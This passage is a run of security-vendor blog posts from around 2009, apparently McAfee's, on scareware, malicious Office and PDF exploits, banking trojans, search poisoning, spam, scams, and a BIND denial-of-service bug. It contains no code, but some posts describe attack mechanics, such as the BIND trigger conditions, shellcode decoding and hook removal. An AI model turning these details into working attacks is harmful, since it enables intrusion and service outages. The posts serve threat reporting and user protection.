3. From pcdef.exe + mousehook.dll + ntdll64.dll (WinPC Defender) to winav.exe + ieocx.dll + iehostcx32.dll (WinPC Antivirus)

4. From Spyware Protect 2009 to Antivirus System Pro

As a gentle reminder to all users: Avoid visiting untrusted websites, install anti-malware products only from trusted and legitimate sources, and update the DATs regularly.

The use of social engineering to grab attention of recipients and to deliver malware is not something novel. The latest trend in spreading malware is to manipulate a happening celebrity story, disaster or other high profile news event. The threat could be delivered as emails or poisoned search engine results which leads to malware. In the past, we have come across innumerable incidents like Michael Jackson demise or Benazir Bhutto assassination used as an arena to spread malware. Lately, we have observed an increase in the number of OLE files being used as targeted attacks against various high profile users.

The exploit and lure claims to contain information on the Pakistani Air Force and arrives via email as a PowerPoint document attachment. When an unsuspecting user having a vulnerable version of PowerPoint launches the document, the vulnerability is exploited and the malicious payload is executed.

The vulnerability is with a malformed record within PowerPoint which can be exploited to execute malicious code. The shellcode makes use of the Process Environment Block (PEB) approach to determine the kernel32.dll base address as shown in the figure below.

Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

The malicious PPT file is exploiting an older vulnerability which was patched by Microsoft in ms06-028 bulletin. This attack is detected with the current DATS as Exploit-PPT.h and the dropped malicious executable is detected as BackDoor-EFB.

Today Avert Labs has published a new research paper, “Inside the Password-Stealing Business: the Who and How of Identity Theft.” With so many financial transactions occurring online today, stealing passwords to banks and other accounts is an irresistible attraction for cybercriminals. Thieves around the world use Trojans and other malware to grab user credentials, which they can resell to their crooked clientele while supporting their own illegal businesses.

Our report uncovers technical details on the capabilities, level of sophistication, and inner workings of the most infamous contemporary password-stealing malware families such as Zbot, Sinowal, and Steam Stealer. We also discuss the prevalence of such malware, distribution channels, how criminals keep up with the changes banks make to keep transactions secure, and how they exploit today’s economic climate. Offering illegal “work at home” opportunities to desperate job seekers is one way criminals lure the unsuspecting into furthering their illegal activities.

You’ll find our report here in English and eight more languages.

Want to peek inside another one of these infamous password thieves? Let’s have a look at SilentBanker.

Our story starts with browser helper objects (BHOs), which are plug ins for Internet Explorer. BHOs give developers the opportunity to extend the browser’s functionality without their having access to the browser’s source code. That doesn’t sound too bad, as users aren’t forced to rely on the browser’s developers to implement new features. Even if you’re not a developer, it’s seems useful to download any desired extension, whether you want to customize the user interface or be able to read PDF documents directly in the browser, isn’t it? Well, yes and no! The answer depends on the trustworthiness of the BHO’s author, the server you download from, or the DNS server. Unfortunately, not all BHOs are safe applications—the bad guys are always looking for ways to turn originally useful features into a way to deploy their malware, hunting for usable information such as credentials. Silentbanker is one of those nasty password-stealing malware that comes in the form of a BHO.

This is one “helper” you don’t want on your side: Once installed and automatically loaded by the browser, Silentbanker can interrupt communication between your browser and the Internet! The malware is highly configurable and targets online banking users. Silentbanker will not only recognize and monitor online banking activity but may also modify HTML pages to include additional code or to change a transfer’s details. The data thief acts as a “man in the middle” to inspect and modify data before it is encrypted and sent to a server and after it is received from the server and decrypted. Still think you’re secure with SSL? Unfortunately that’s not the case with this freeloader sitting on top of the browser.

The screenshot above shows a pseudocode representation of Silentbanker’s malicious core. The code is responsible for detouring relevant operating system functions to its own malicious routines. This malware effectively kills security applications such as host intrusion prevention systems and others. Before its own malicious detours are installed, the malware disables any previously installed detours by reading a Windows library’s original code from the hard disk (”read_whole_file”), and then mapping it back to the process’ memory (”remove_API_hooks”)—thus rendering security products relying on the same technology ineffective.

Be sure to run McAfee VirusScan and Artemis, and McAfee Gateway Anti-Malware within your corporate network to protect your systems from password thieves.

In the latest social-engineering tactic targeting online games players, a new spam campaign attempts to lure users into downloading a Monopoly game–though it’s more like a game of Russian roulette. The email is a seemingly innocuous invite from a random user (your first clue that this is something to avoid!). The message uses a subject line such as “Play Online Together” or “Tom has invited you to play Monopoly.”

If recipients follow the link to monopoly2009.com, they are greeted with a web page that looks fairly well done. It advertises “Monopoly” while giving a brief history of the game and providing some fun facts. It also, of course, encourages users to download the app using several links dispersed throughout the page.

No code is injected on users’ computers just by visiting the web page. They need to download and install monopoly.exe, which the site delivers. The executable file is just the first stage of the process, however. A fairly common tactic deployed by hackers is that the code installed as a result of the download is only the beginning. At this point the Trojan is activated on the victims’ computers, and it links to another computer and downloads the second stage of the malware, the piece that turns machines into a spam-sending zombie touting Canadian Pharmacy products.

To help sell the deception, the folks who created the page include a hit counter to suggest that there are people playing the game online right now. Don’t be fooled. This ruse is merely the number of how many people have visited the page thus far.

I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends.) I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

It seems now that attackers are combing various elements of different attacks to achieve blackhat SEO.

There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different than in the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation. 

Historically we’ve seen attackers upload malicious content to compromised sites, either directly by injected exploit code, or indirectly by injecting an iframe or script that brings in exploit code from a remote site.  Such situations can lead to site users notifying the compromised site administrator that they were attacked while visiting that site. Redirecting victims to a completely different site can help conceal the poisoned site.

The attackers go a step further by implementing a well used trick, which is to redirect conditionally.  It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) navigating to http://compromised-site.com/attacker_created_page will not be redirected to a payload site unless they are coming from a Google search-result page. 

Some of the compromised sites are running older, vulnerable phpBB and Word Press applications.  Others sites are serving attacker HTML pages, perhaps from compromised admin/user credentials or misconfigured web servers.

These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

We hear a lot about cybercrime events concerning Facebook or Myspace, but do you know ASmallWorld? It is a private international community for the jet-set crowd and culturally influential people.

Yesterday the French police force (OCLCTIC), accompanied by FBI agents, arrested two French residents. They were suspected of hacking this social-network platform dedicated to the worldwide upper crust. They allegedly attempted to extort US$1 million from the webmasters to not divulge stolen data.

Two years ago, a paper named “Asmallworld.net: we have hacked the smartest worldwide website” made some noise in France.

Whether you mingle with the jet set or in other circles, be careful when you share information on your favorite social network platform!

Another celebrity death.  Another recycled scareware tactic attempting to lure users to download malware by telling them that their PC is infected with a virus.  We saw it after the deaths of Michael Jackson, Farrah Fawcett, and Natasha Richardson earlier this year.  Now the attention of cyber criminals has turned to Monday’s death of Patrick Swayze as the soup du jour for malware distribution.

Queries for information on the death of the popular actor may lead to news stories that look legitimate when returned in search results, but when followed may lead users to a site that looks like this:

This similar tactic of presenting a window to the user that looks very much like a legitimate Windows popup has been used many times before in various forms.  The Windows Explorer-like screen presented to the user also uses geolocation in an attempt to identify the country and city that the user is coming from in to make the user believe that their data is actively under attack.  Popups with phrases like “Scan procedures finished.  34 Potential aggressive items was found!” and “Your computer remains infected by threats!  They might lead to data loss and file structure damage, and needed to be heal as soon as possible.  Return to Total Security and download it secure to your PC” also attempt to trick users into believing that the only way that they can protect themselves from infection is by downloading bogus security software.

Clearly scareware tactics are something that cyber criminals have latched onto as a popular method for malware distribution as it continues to be a recurring and evolving theme.  Conficker/Downadup largely popularized scareware with its success (although it wasn’t the first to use it) and now others are riding of that popularity to re-purpose it for their own scams.

Wouldn’t you know it. Just the other day I blogged about rogue anti-virus software makers selectively targeting certain hot search terms. Since then the majority of top terms lead to poisoned links within the top 10-20 search results.

Recently there have been some news stories about attackers targeting specific topics or terms, but from what I’m seeing they are pretty indiscriminate. It doesn’t matter what the topic is. If people are searching for it, then the bad guys want to poison the results. The speed at which these links appear suggests the operation is largely automated. 

Here’s one example for bengals blackout. One potential way of identifying a bad link is if the title is exactly the same as search term, it’s in all-capital letters, and the URL contains the search terms as well. The summary usually contains the text you’d expect to find from a news story. This is not a foolproof way to call something bad, but it’s a strong indication that something might be fishy.

Search safe.

Today we released the new version 2.1 of McAfee FileInsight. You can download your free copy from the Avert Tools site. FileInsight is a handy integrated tool environment for web site and file analysis. Hex editing, syntax highlighting, and it comes with several built-in decoders, built-in calculator, a disassembler, JavaScript scripting support, a Python-based plugin system and many more.

Let’s go through some stages of an exemplary malware attack to highlight some of its analysis features – but don’t try this stunt at home, unless you know what you’re doing; a safe, isolated lab environment is absolutely mandatory for any such research work.

The above screen shows the initial malicious web site, trying to determine your browser and redirect to one or more respective exploits of choice. One of them being an exploit for the Microsoft DirectShow Video ActiveX Control Vulnerability (MS09-032) (stopped as “Exploit-MSDirectShow.b” by McAfee Virus Scan and as “BehavesLike.Exploit.CodeExec.EBEO” by McAfee Gateway Anti-Malware).

Getting to the actual shellcode takes some JavaScript unpacking steps. The JavaScript code is spread over several script files and custom encoded. In the above screen, we take that malicious code into FileInsight’s Scripting window and let it deobfuscate there.

Once we’re down to the shellcode level, we can directly look at the shellcode in the built-in disassembler. The Disassembler window also features recursive traversal to come up with branch labels automatically. It CALLs-to-POP in order to determine actual memory location of the obfuscated payload, sets up and loops to decode the payload, and then executes that in order to download a XOR-obfuscated executable that turns out to be a UPX-packed backdoor (stopped by Artemis and by McAfee Gateway Anti-Malware as „LooksLike.Win32.Suspicious.C“). Advanced users may also want to look into FileInsight’s Python-based plugin system, but be warned: writing plugins at the overwhelming simplicity of the Python language has a certain addiction potential!

FileInsight is available here.

The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

The report reveals the truth behind the “Chinese pharmacy” spam:

• “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
• Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
• “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
• If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

• The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
• The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

Check out the full report here.

It’s been a while since I blogged about Google Trends being abused to serve malware. However, recent attention around Google search poisoning led to me to check on things. It seems the attackers are being more selective in the search terms that they target–favoring those that have something to do with computer security. Hunting for poisoned search results based on random hot-search terms is hit or miss (and more miss than hit, at least in the top 10 results being poisoned). But terms that contained virus, trojan, rogue, and bulletin all lead to poisoned top search results. Some even lead to pages and pages of bogus links, which redirect to rogue anti-virus malware.

The following image is not intended to show the actual text of the search results, but rather it highlights the fact that four out of the top fifteen results are poisoned for one of today’s most searched terms at the time of this writing:

Starting from result number 20, the situation gets much worse–with dozens of poisoned results:

Granted, the link names on the second batch of results have nothing to do with the trojan search term I used. However, the attackers have set up thousands of pages that cross-link to each other, and contain various hot-search terms and content. So even if the long tail of poisoned results on any search term has a low conversion rate for that term, it can still serve to boost the score of other pages and terms that have a higher conversion rate.

Once a search user takes the bait, it’s business as usual for the attackers:

Graphic displayed while web page loads

Bogus warning message displayed from web page

Simulated system scan displayed from web page

Bogus scan results displayed from web page

I always get a lot of questions about confidence scams.  These types of spam emails have been around almost as long as email has been available to the public.  Confidence scams are a child of phishing scams, and the annoying little brother of lonely girl scams, always showing up at the wrong time or hiding just around the corner.  They’re difficult to eliminate completely because they are always re-inventing themselves. 

Confidence scams, like lonely girl scams, are attempting to relieve a target of their money by convincing them to give it up willingly for a cause.  They can appeal to the compassionate heart by asking for help with an orphanage, or to a baser greed by asking for help smuggling money out of a country.  

The emails themselves are generated by a sweatshop of workers who create an account on a free email website, fill in a vague template with plot points, and then send it off to random recipients.  A different reply_to field is created in order to redirect any replies to another free email account which is there solely for the purposes of receiving the replies (the scammer assumes that the newly created sending account will be revoked for the spamming actions). 

Often confidence scams will attempt to validate themselves by linking to a news website or referencing a story that is seen in the news.  Take this example

The article it links to is a real article, and a real story.  It intrigues the mind with possibilities of winning the lottery, and combined with a belief that everything happens during war or that America’s soldiers are fraught with corruption as portrayed in Hollywood cinema might lead one to believe that the grain of truth to this scam is greater than the BBC article.

Here is another snippet from a confidence scam that is actually based more in the realm of fact than the last one:

As unbelievable as it may sound, a web-search reveals the story is actually taken from a New York Times article:  http://www.nytimes.com/2007/10/07/world/africa/07congo.html

Confidence scams can range from a sentence to a couple pages of text.  Though not all confidence scams fit the following outline, it generally covers what we expect to see in a confidence scam:

1.  A generic greeting/intro
2.  A tragedy or plotline
3.  A far-away location
4.  Eagerness to do a financial transaction
5.  Promises of compensation/reward
6.  Providing alternate means of contact / confidence

Many people recognize confidence scams when they see them.  They tend to range from annoying to amusing.  The target audience for these scams is usually the older generation of people who are less familiar with technology and email and are more likely to believe that modern financial transactions are still performed with a check or money order.  As the target audience is generally retired they are often using free email accounts which are not protected from spam to the same degree as enterprise level corporate employees. 

Children who fear their aging parents could fall into this trap might consider creating an account for them on a social networking site, locking it down to prevent messages from non-friends and linking the alerts to the child’s email address.

Many major security companies are about to release their new retail product for 2010. Expect some comparative reviews in the next months, check what you need and stay protected.

Some ‘2010’ products are already out on the web, but unfortunately most of them are FakeAlert Trojans or Scareware.

Once downloaded, you see pop up windows alerting you about a malware found on your machine and asking you to buy the product. The actual problem is the software you just executed.

We have been reporting about FakeAlert Trojans before – you may remember some products named:

- “Virus Remover 2007”
- “Win AntiSpyware 2008”
- “AntiVirus VIP”
- “AntiSpyware Pro2009”
- …

To name just a few, but let’s look at this “2010” example:

Before you think about buying a new product or testing a trial version, you should:

- Use McAfee SiteAdvisor to get a rating of the page you’re looking at.
- Type the product name into your favorite search engine and have a look.
- Check comparative reviews – don’t believe in the awards posted on the page.
- Still unsure? Go to the next store and buy a box. There are no FakeAlert products available as box in a store. They sell online only.

If you are already running an AntiVirus product from a known vendor and you get annoyed by popups, bogus alerts or have a different issue, contact the Technical Support first.

Quote from the bottom of the screen:

According to security experts, most spyware types are not detected by antiviruses because they are disguised as legitimate software installed with the user’s consent.

Actually, ‘PC Antispyware 2010’ is a perfect example for such a “malicious software disguised as legitimate software”.

Of course, we and other major security companies do add detection for those Fake Alert products as Trojan.

McAfee SiteAdvisor rates this page as RED.
McAfee VirusScan detects the installer as Generic FakeAlert.d!gen
McAfee Secure Gateway detects Trojan.Dldr.FraudLo.sxm

I like to pick on malware writers, especially the dumb ones as you can see here. Sometimes they’re just too big a target to ignore.

The latest round is with Brazilian malware writers again. As you are aware, some days ago the Delphi virus was discovered; we detect it as W32/Induc. So today I got a Brazilian PWS-banker malware that was infected with–guess what?–the W32/Induc delphi virus! What an irony.

Back in 2007, I wrote about something quite similar here. And, surprise, it was another Brazilian PWS-banker malware.

So, please, malware writers, repeat after me: “I must install anti-virus software. I must install anti-virus software.”

Today, you can buy a customized Brazilian PWS-banker malware for about US$50. That may explain why it is so cheaply made.

There is a light at the end of the tunnel—risk and compliance technologies and standards are relieving auditors and businesses in this age of increased electronic accountability. On the heels of our integration of SolidCore’s technology, researchers from McAfee Avert Labs have laid out the compliance challenges facing organizations, and the new standards that can save thousands of hours, in the latest edition of the McAfee Security Journal.

Organizations Suffer from Audit Fatigue

Of the many compliance obstacles facing organizations, the sheer volume of audits is perhaps the most oppressive impediment to returning to “business as usual.” With more than 400 separate sets of requirements facing organizations internationally, global institutions can face more than 40 diverse mandates. Failure or noncompliance is not an option, as reputational damage and severe consequences levied by regulatory agencies can have severe financial consequences for businesses.

In a McAfee-sponsored survey, one organization estimated that to prepare for their PCI audit, the company spent 1,000 hours in one week to configure audit settings. Another organization spent more than 18,000 hours to prepare for external audits in one year. Even when faced with such overwhelming compliance demands, more than 51 percent of organizations surveyed still used spreadsheets to execute audits.

Three Steps to a Better Audit

Organizations that embrace IT as the path to solving compliance issues should follow three key steps to combat audit fatigue:

1. Establish a governance committee: By connecting executives with operational realities, a governance committee can help focus compliance spending where it will be used to its fullest
2. Automate the IT audit process: By investing in risk evaluation and auditing technology, companies can automate the vast majority of once-manual, time-consuming tasks, better ensuring ongoing compliance and reserving IT energy and spending for strategic priorities
3. Adopt a well-built framework: By adhering to a consistent framework throughout an organization, IT can consolidate the number of separate audits it must conduct

SCAP Leads the Way in Next-Generation Audit Standards

The emergence of the Security Content Automation Protocol (SCAP) signals a change in traditional risk and compliance architecture. Using SCAP-compliant products, companies can now eliminate the need for vendors to issue updates when new policy or regulatory mandates are decreed. By immediately integrating new changes in policy, SCAP improves vulnerability detection, asset management, risk monitoring and response, threat publishing, and more. As more technologies support the continuing evolution of audit demands and evolving infrastructures, the more automated the audit process will become.

To learn more about McAfee’s insights into the status of risk and compliance technologies, read the newest edition of the McAfee Security Journal.

“FREE” is by far the most commonly used term in spam mails. The word free is such a striking term that any layman, without the knowledge of these tricks of the trade, can get into the trap of cloaked mails sent by the spammers.

Here are a couple of the most often used sentences in spam mails:

•  We are letting you try it for FREE, you just pay the shipping costs!
•  FREE Download without limits!
•  Get your Free Trial Now!
•  Take FREE exotic vacations!
•  Get Free trial bottle!

This barrage reminds me of the maxim “appearances can be deceiving.” This adage becomes true in a scenario in which an innocent user falls pray to these eye-catching spam mails and then regrets it later.

Coming back to the main topic of broadcasting for “free,” we are observing a trend wherein spammers abuse social networking websites quite frequently by creating fake accounts to host spam.

The most common trend these days is spammers inserting spoofed URLs associated with social networking and social bookmarking sites such as Blogspot, Yahoo Groups, and Google Groups to host porn, health, replica watches, acai power slim, and many others categories of spam on them. Thus it becomes a big challenge for these social networking sites to moderate any abusive or spammy messages on their networks.

A recent and classic example of how the bad guys (spammers) take advantage of some really cool features provided by these networking websites will leave you amazed. Have a look at the following sample, which will give you a better understanding of these types of spam mails.

“Get your Free Trial Now” is a hyperlink to “google.com/reader/view/user/…” Clicking it will redirect you to the web page, where the spammer has created a fake profile on social networking websites. The actual spam is in the form of an image that is again hyperlinked to the main spam website. Basically the spammers have abused the “sharing items” feature to their advantage and are spreading spam.

The feature-sharing items allows you to share all your reading-list contents with the public.

Why is the spammer using a different approach altogether rather than simply placing the spam URL in the mail?

It’s very easy for anti-spam filters to cut out mails with URLs that have been recently created and are hosting spam. An example to this would be URLs with .cn domains hosting meds spam most of the time.

Due to a seeming inability to filter and remove their content, spammers abuse social networking websites far more than any other free web-hosting site. We advise our customers to be cautious about such mails and refrain from clicking any URLs in them.

We’ll finish with some more typical examples of how spam looks on social networking websites.

Pharmacy

Replica Watches

Acai Power Slim

We generally classify email messages pretending to be from a family member of a (often African) dignitary or from a desperate young woman as scams. In the first case, the sender sometimes explains that following the death of an influential dignitary a large sum of money is blocked in a bank account somewhere. With the recipient’s help and using his or her financial backing for a money transfer, the sender says that it would be possible to release the money. Substantial compensation is offered to whoever agrees. In the second case, the unknown beauty becomes a friend with the victim and suddenly has a terrible money problem.

For some individuals, these swindles, called advance fee fraud (also known as 419 fraud) and romance scam, are a primary source of revenue. They also employ lottery and fake price scams.

In Eastern Europe senders remain discreet and hide their wealth. But in some African countries such as the Ivory Coast, many crooks work openly. After reading a news item on this subject at the France24 observers web site, I searched the French Skyrock social networking platform and discovered the photos and videos from their exploits. Each crook has his own blog entries and is attached to a gang web page were each member is listed in a friends list. They are plenty boastful. Among the group names, we have:

• les banquiers arabes (the Arab bankers)
• la banque africaine (the African bank)
• les boucantiers de la Cote d’Ivoire (The Ivory Cost boucantiers)
• les plus riches (the richest)
• etc.

Here is one example:

According to 419 AFF, losses from advance fee fraud in 2007 by companies and individuals reached US$4.3 billion.

In France, one naive victim recently lost €1 million!

Last year, Janella Spears of Oregon is reported to have lost $400,000 (£270,000) after falling under the spell of one such criminal. Here is her account:

The naive are numerous, and cybercriminals know it. We must remain vigilant.

While Dmitri Alperovitch wrote his blog entry about the recent DDoS attack against Twitter and some other platforms hosting accounts of a pro-Georgian blogger nicknamed cyxymu, I browsed the Internet, searching for malicious websites taking advantage of this topic.

In second place in my google search request, I was attracted by a link proposing to add the blogger to my friends. This link was a lure redirecting me on a site promoting a fake anti-virus product.

Once again, we did not have to wait long before encountering such sites taking advantage of the news.

Twitter, LiveJournal, FaceBook, Youtube, Fotki–what do they have in common? They all hosted an account of a pro-Georgian blogger who went under the nickname cyxymu (taken after Sukhumi, the capital of Abkhazia, one of Georgia’s pro-Russian breakaway republics and the city he professed to flee from in 1993 during the republic’s war with Georgia). And they all suffered a distributed denial-of-service (DDoS) attack during the course of the day yesterday, an attack that was able to take down Twitter for several hours and significantly slow down connectivity to Facebook. Reportedly, the attack packets sent to the targeted social-media sites were requests to fetch the pages hosted for this user, who had just a few days ago blogged about the upcoming one-year anniversary of the war between Georgia and Russia.

In addition to the web-based DDoS attacks, McAfee’s TrustedSource reputation system had also detected a spam campaign that referenced the targeted blogs. We believe this campaign had a dual purpose. On one hand, the attackers spoofed the email address of the blogger, which is hosted on Gmail, as the originator of the spam. As a result, the blogger’s inbox was flooded with out-of-office notifications and vacation bounces automatically sent by mail clients of people who had received this spam. This was likely part of an intimidation campaign designed to send a message to cyxymu about who was the real intended target of the DDoS. In addition, the spam contained links to the blogger’s sites, with the likely goal of bringing even more traffic to bear on the servers of those blogs than would already be caused by the DDoS. 

Screenshot of the spam bounces in cyxymu’s mailbox that he had posted after the attack on abkhaziya.net, one of his backup blog sites

In our analysis, the spam appears to have been distributed, at least partially, by the same botnet as the one that was used for the DDoS. Of the infected machines spreading the spam, 29 percent were located in Brazil, 9 percent in Turkey, and 8 percent in India.

We detected two distinct spam runs that began around 8 a.m. EDT on Thursday, August 6 and started winding down around 11 a.m. the same day, with the last messages being detected at 4 p.m. Only the second spam run, the larger of the two, spoofed cyxymu’s email address, while the first one randomized the senders’ email addresses.

URLs that were attacked include:

http://twitter.com/cyxymu
http://www.youtube.com/Cyxymu
http://www.facebook.com/cyxymu
http://cyxymu.livejournal.com
http://cyxymu1.livejournal.com
http://fotki.com/cyxymu

The IP addresses included in the attacks were detected proactively by McAfee’s TrustedSource as having a malicious reputation.

A new, remotely exploitable denial-of-service (DoS) vulnerability affecting BIND Version 9 was reported by ISC on July 28. It’s also reported that exploits have been seen in the wild.  Because BIND is widely used, these attacks can affect many critical infrastructures. Here’s a little description of the problem.

The vulnerability exists in the DNS dynamic-update request message. Dynamic update (RFC 2136) was implemented in DNS to deal with constantly updating DNS records in various DNS servers. The individual DNS servers can send update messages back to the DNS zone master so that the master record can remain current. Each update message should contain at least a zone record, a prerequisite record, and an update record. The zone record specifies which zone the update message is for. Only the zone master can update the record for itself. The prerequisite record specifies the condition in which the server should check before updating, and the update record contains the updated record.

The vulnerability that was reported yesterday exists due to the improper handling of a specially crafted DNS dynamic-update query. There are two conditions in the update query that need to be met for this packet to trigger the vulnerability: The victim’s DNS server must be the master of the zone specified in the update query packet; and the update query packet consists of a prerequisite record with the type “ANY.” ANY is not expected in any resource record because it’s defined only as a question type. The victim’s DNS server cannot handle this condition and shuts itself down. The attacker can cause a denial-of-service on the vulnerable DNS server with just one UDP packet. In fact, the attack will succeed even if dynamic update is disabled on the victim’s DNS server.

Patches are available from ISC for BIND Versions 9.4.3-P3, 9.5.1-P3, and 9.6.1-P1. Users and administrators should apply these patches immediately because the exploit is public.

McAfee Network Security Platform detects this attack using the signature set released on July 30 with the signature “DNS: ISC BIND 9 Dynamic Update Denial-of-Service Vulnerability.”

Following up on the recent post by my colleague Dave Marcus concerning malware growth, the guys from AV-Test in Germany just released their updated stats. To avoid confusion when comparing the different numbers, here’s a quick explanation of the different counts:

AV-Test counts unique binaries. Unique means different cryptographic hashes. So the same Trojan, obfuscated with 10 different packers results in 10 unique binaries. This is often due to the impact of server-side polymorphism, where you get a unique binary every time you download a file.

Our outbound counting, as used by Marcus, counts the threats for which we have to create a driver for detection. If in the example above we are able to look beneath the obfuscation layer of the packers, the 10 different binaries would be counted as just one Trojan. In addition to that, we frequently use generic detection, in which a single count could hit on thousands of minor variants.

Now that the different ways of counting may be a bit clearer, let’s look at the bad news:

AV-Test’s count has come close to 22,000,000 samples in June.

(Click here for a larger image.)

This by itself is disturbing, but the really disturbing trend is visible when we look at the growth month over month:

(Larger image here.)

The growth has been fairly constant over the last year but this has changed now.

We are now seeing a major increase in the monthly growth, topping one million new samples each month in AV-Test’s count. And this time it’s not only samples (the same piece of malware packed over and over again) but also actual new malware. If you look at Marcus’ numbers again–growth in 2009 has nearly tripled compared with 2008 and remembering that we count malware rather than samples–this indicates there has been a shift recently in malware production. Tons of new Trojans have been developed and released on top of the reused stuff.

So keep your machine updated, not just AV and the OS but all applications. Watch out where you surf. (SiteAdvisor may help you there.) And take care what links or attachments you trust in emails and all other forms of messages. All this will help you enjoy the summer!

As we already mentioned multiple times in the past, exploits that take advantage of newly discovered holes in popular applications represent a growing threat to Internet users. Many, if not most, computer systems are vulnerable to these attacks. More evidence shows zero-day attacks remain the preferred choice of cybercriminals.

Today, a new unpatched Adobe vulnerability has been discovered in the wild. It takes advantage of a new feature to add interactive Flash (SWF) content into PDF files. This bug was found to affect at least Adobe Reader and Acrobat 9.1.2 , as well as Adobe Flash Player 9 or later.

In our investigation of the issue, we found that Acrobat 9 introduced a new “Rich Media” annotation type, which uses Acrobat’s built-in Flash Player to play SWF content. In the current attack, specially crafted SWF files were embedded into PDF documents. These can cause Adobe Reader to execute arbitrary code when viewed. When successful, shellcode in the exploit is executed by Adobe Reader. The picture below depicts how the shellcode works and what it does:

It first gets a KERNEL32.dll image base using the Windows PEB structure, sets up the required Windows APIs, then decrypts and executes its malware payload. This specific malicious PDF file contains three embedded executables encoded using a simple 1-byte XOR key. When run, it drops a file called SUCHOST.EXE and sends the information gathered from the infected machine to a free host-redirection service based in China:

• [blocked].3322.org
• [blocked].2288.org

The victim is then redirected to other malicious IP address(es). This malware acts as a backdoor to allow remote access to the infected computer.

According to Adobe, the Rich Media annotation is new to Acrobat 9.x and will not be understood by PDF document viewers that can support only up to Acrobat 8 specifications. Thus, if you place the SWF file with Acrobat 9 into the PDF files, it is not readable by Acrobat or Adobe Reader 8 and older versions, and will not be vulnerable to this attack.

Although details of this vulnerability have not yet become public, more attackers are likely to take advantage of this weakness. For McAfee customers, both the PDF and its associated payload can be proactively detected as “Exploit-PDF.t” since the 5683 DATs (released July 21).

Even though anti-malware vendors continue to add detection for new zero-day threats, there are several things you can do to mitigate such risks. Refrain from opening attachments from untrusted sources and visiting untrustworthy web sites.

This bug is currently being investigated by the Adobe Product Security Incident Response Team.

(Thanks to Abhishek Karnik and Aditya Kapoor for helping to analyze the malware.)

Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

In our world of anti-malware, we follow a simple formula, “Media + Celebrity = Watch out for malware”. Whether you are an eager fan or just someone surfing on the web for news, beware. An Internet search, combined with the right keywords on your favorite search engine, is expected to lead you to malware. In our investigation on the following case, it has led us to a malicious website hosted at [removed].report-cnn.com/[removed].

Although it was made to look like a real one, this website is NOT related to CNN. At the time of research, it was still live and distributing malware using the “you need a video player” technique that has been repeatedly used in similar attempts in the past. Using this method, the user is often enticed to an attractive video but must install a new video player program.

The victim clicks on a link that allows downloads and installs an executable program which subsequently installs malware. It usually follows with a pop-up message reporting that the downloaded video player program is corrupted!

The current case comes with a slight twist. An option to download the “video player” is given only if you already have Adobe Flash installed. This first step allows users to view some initial pictures, as if they were browsing legitimate news content from the site. It then further entice users to view the “live video” by installing a video player, which instead contains malware. Once the malware is downloaded, a video is actually streamed to the user off an external link from Google. This link, of course, has nothing to do with the downloaded video player. Gullible users would actually believe that running the downloaded program enabled them to view the video.

This malicious website recognizes the target operating system by checking the User-Agent banner information sent to the web server by the web browser client. In our tests, a .exe file is delivered to a Windows-based web browser while a .dmg file is delievered to Mac OS-based web browsers.

The malware downloaded from this site are currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware will be detected as OSX/Puper.a Trojan. In other related cases, we are currently detecting them as Generic FakeAlert.a and Generic FakeAlert.c.

We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

Today, Microsoft released a security advisory on active attacks in the wild using a vulnerability in Microsoft Office Web Components. Computers installed with Microsoft Office features that uses vulnerable versions of the Microsoft Office Web Components could be infected with malware when browsing upon malicious websites in Internet Explorer. 

From our investigation, Exploit-CVE2009-1136, a new 0-day exploit was added into web exploit toolkits that widely released Exploit-MSDirectShow.b  on hijacked websites in China just the previous week.  Since the start of this new wave of attacks, new trojans installed by Exploit-CVE2009-1136 has been detected by Artemis technology which also allow us to get a global view of the spread of this new threat.

In one of the new trojan samples used by Exploit-CVE2009-1136, we first saw Artemis queries coming from China at 11:53 GMT on July 13th, 2009. We didn’t have automatic protection for this at this point, but various systems analyzing the threat details soon mark this as malicious.

By now, this sample has spread to many other Internet users in China, and is now queried and blocked by Artemis more than 328 times at more than 145 unique IP addresses (ISP , not end point).

Besides China, we only saw Artemis queries coming from Virus Total (Spain) and fellow malware researchers in the UK and Germany in small numbers.

We will post more information as we receive it.

McAfee Avert Labs has received a new variant of the Koobface worm. Unlike the previous variants, this one spreads using Twitter by sending fake tweets.

These fake tweets contain links to a video; some of these videos are named “My home video.” When users click these links they are prompted to install a video codec. However, upon following the instructions it actually downloads a variant of the Koobface worm and installs it.

